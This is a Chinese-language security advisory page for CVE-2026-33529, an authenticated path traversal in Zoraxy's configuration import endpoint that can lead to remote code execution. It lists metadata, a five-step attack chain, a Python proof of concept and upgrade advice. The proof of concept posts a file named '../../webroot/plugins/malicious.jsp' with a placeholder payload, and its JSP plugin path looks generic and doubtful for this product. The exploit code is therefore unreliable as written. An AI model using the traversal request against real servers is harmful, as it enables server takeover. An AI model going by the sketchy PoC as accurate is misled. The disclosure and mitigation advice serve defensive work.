CVE-2026-33529 CVSS 3.3 低危

CVE-2026-33529 Zoraxy认证路径遍历致RCE

披露日期: 2026-03-26

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-33529

漏洞类型

路径遍历

CVSS评分

3.3 低危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

无需交互 (UI:N)

影响产品

Zoraxy

漏洞概述

Zoraxy是一款通用HTTP反向代理转发工具。在3.3.2版本之前，其配置导入端点存在认证后的路径遍历漏洞。攻击者可利用该漏洞在配置目录之外写入任意文件，并通过创建恶意插件的方式最终实现远程代码执行，服务器面临被完全控制的风险。

技术细节

该漏洞出现在Zoraxy的配置导入功能中。由于系统未正确过滤用户提供的文件路径参数，经过身份认证的攻击者（需高权限）可以通过“../”序列进行目录遍历攻击。这使得攻击者能够将任意文件写入到Web服务器的预期配置目录之外。利用该漏洞，攻击者可以上传恶意的动态链接库或脚本文件到插件加载目录，利用Zoraxy的插件机制执行任意代码，从而获得服务器控制权。

攻击链分析

STEP 1

1. 身份认证

攻击者需要获取管理员级别的高权限账户凭证。

STEP 2

2. 发送恶意请求

向配置导入端点发送特制的POST请求，文件名包含路径遍历字符（如../）。

STEP 3

3. 写入恶意文件

利用漏洞将恶意文件（如WebShell或插件）写入到系统任意位置。

STEP 4

4. 触发执行

通过访问该文件或等待系统加载插件，触发恶意代码执行。

STEP 5

5. 获取控制权

成功获得服务器远程代码执行权限。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target URL (example)
target_url = "http://target-ip:port/api/config/import"

# Attacker's session cookie (requires High Privilege)
cookies = {'zoraxy-auth': 'admin_session_cookie_here'}

# Malicious payload content
plugin_content = "<% code to execute RCE %>"

# Path traversal payload to write outside config dir
files = {
    'file': ('../../webroot/plugins/malicious.jsp', plugin_content, 'application/octet-stream')
}

response = requests.post(target_url, cookies=cookies, files=files)

if response.status_code == 200:
    print("[+] PoC executed successfully. Check if file was written.")
else:
    print(f"[-] Failed. Status: {response.status_code}")

影响范围

Zoraxy < 3.3.2

防御指南

临时缓解措施

建议立即将Zoraxy升级到v3.3.2或更高版本以彻底修复该漏洞。若暂时无法升级，应严格限制管理后台的访问来源IP，并密切监控系统文件变动及插件目录，防止未授权的文件写入。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表